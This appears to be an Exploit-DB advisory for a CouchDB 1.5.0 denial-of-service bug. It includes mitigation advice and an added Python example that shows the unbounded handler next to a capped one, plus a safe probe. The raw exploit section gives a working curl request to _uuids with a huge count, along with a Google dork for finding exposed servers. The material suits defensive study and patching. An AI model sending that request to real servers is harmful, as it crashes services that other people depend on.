Vendor: Couchdb
By: KrustyHack
CVSS: 7.5 (HIGH)
Type: Denial of Service (DoS)
CWE: 400
Product Name: Couchdb
Affected Version From: up to 1.5.0
Affected Version To: up to 1.5.0
Patch Exists: NO
Related CWE: N/A
CPE: a:apache:couchdb
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2014

Couchdb uuids DOS exploit

This exploit lets an unauthenticated attacker cause a denial of service (DoS) on a CouchDB server by sending a single GET request to the _uuids endpoint with an absurdly large count parameter. The server accepts the value without an upper bound and tries to generate that many UUIDs in memory before answering, so the process keeps growing until the host runs out of RAM and the CouchDB node dies. No authentication is needed because _uuids is readable by anyone who can reach the HTTP port.

Mitigation:

Limit the number of UUIDs that can be requested from the _uuids endpoint: enforce a server-side cap on the count parameter and reject requests that exceed it, or cap/reject oversized count values at a reverse proxy in front of CouchDB. As a general hardening measure, do not expose the CouchDB HTTP port to untrusted networks. Verify the cap non-destructively by requesting a moderate count (a few thousand) and checking that the server either rejects the request or returns fewer UUIDs than asked for; do not test with the exploit's value on a server you care about.
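The following is an added example and is not code from the original advisory or from the CouchDB project. It models the _uuids handler in Python to show the unbounded behaviour described above next to a capped version of the count check, and adds a non-destructive probe that asks a target for a moderate count and reports whether a cap is in place. The cap value MAX_UUID_COUNT and the function names (parse_count, count_is_allowed, hardened_uuids, probe_uuids_cap, classify) are this example's own assumptions, not CouchDB configuration or API names.

```python
"""Added example (not from the advisory or CouchDB): unbounded vs. capped
handling of the _uuids count parameter, plus a safe probe for the cap."""
import json
import uuid
from urllib.error import HTTPError
from urllib.parse import parse_qs
from urllib.request import urlopen

# Assumed server-side cap; choose what your deployment actually needs.
MAX_UUID_COUNT = 1000

# The exploit's count value from the advisory, for reference.
EXPLOIT_QUERY = "count=" + "9" * 71


class BadRequest(ValueError):
    """Raised when the count parameter must be refused."""


def parse_count(query_string: str, max_count: int = MAX_UUID_COUNT) -> int:
    """Hardened parse of ?count=N: refuse non-integers, negatives and
    anything above max_count instead of trying to honour it."""
    params = parse_qs(query_string, keep_blank_values=True)
    raw = params.get("count", ["1"])[0]  # default of one UUID when absent
    try:
        count = int(raw)
    except ValueError:
        raise BadRequest("count must be an integer")
    if count < 0:
        raise BadRequest("count must be non-negative")
    if count > max_count:
        raise BadRequest(f"count exceeds maximum of {max_count}")
    return count


def count_is_allowed(query_string: str, max_count: int = MAX_UUID_COUNT) -> bool:
    """True if the hardened parser would accept this query string."""
    try:
        parse_count(query_string, max_count)
        return True
    except BadRequest:
        return False


def vulnerable_uuids(query_string: str) -> list:
    """The unbounded behaviour: parse count and materialise that many UUIDs
    in memory before answering. With the advisory's 71-digit count the
    list comprehension never finishes; the process just grows until killed."""
    count = int(parse_qs(query_string).get("count", ["1"])[0])
    return [uuid.uuid4().hex for _ in range(count)]


def hardened_uuids(query_string: str) -> list:
    """Same handler with the cap applied before any allocation happens."""
    count = parse_count(query_string)
    return [uuid.uuid4().hex for _ in range(count)]


def classify(status: int, body, requested: int) -> str:
    """Turn a probe response into a verdict on whether a cap is enforced."""
    if status in (400, 403):
        return "capped (request rejected)"
    if status == 200 and isinstance(body, dict):
        n = len(body.get("uuids", []))
        if n >= requested:
            return "uncapped (honoured full count)"
        return f"capped (returned {n} of {requested})"
    return f"unexpected response (HTTP {status})"


def probe_uuids_cap(base_url: str, count: int = 5000) -> str:
    """Ask the target for a moderate count that a capped server should
    refuse or trim, but that is harmless to an uncapped one."""
    url = f"{base_url.rstrip('/')}/_uuids?count={count}"
    try:
        with urlopen(url, timeout=10) as resp:
            return classify(resp.status, json.load(resp), count)
    except HTTPError as err:
        return classify(err.code, None, count)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:5984"
    print(probe_uuids_cap(target))
```

The probe uses a count of 5000: small enough that an uncapped server answers in milliseconds, large enough that a server enforcing a cap in the low thousands will reject or trim it. Note that vulnerable_uuids(EXPLOIT_QUERY) would behave exactly like the vulnerable server and must not be run.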

Exploit-DB raw data:

# Exploit Title: Couchdb uuids DOS exploit
# Google Dork inurl: _uuids
# Date: 03/24/2014
# Exploit Author: KrustyHack
# Vendor Homepage: http://couchdb.apache.org/
# Software Link: http://couchdb.apache.org/
# Version: up to 1.5.0
# Tested on: Linux Couchdb up to 1.5.0

HOW TO
======
# The URL is quoted so the shell does not treat '?' as a glob character.
curl 'http://couchdb_target/_uuids?count=99999999999999999999999999999999999999999999999999999999999999999999999'

TEST
====
Tested on a 16G RAM quad-core server. CouchDB was dead within 30 seconds with only one GET request.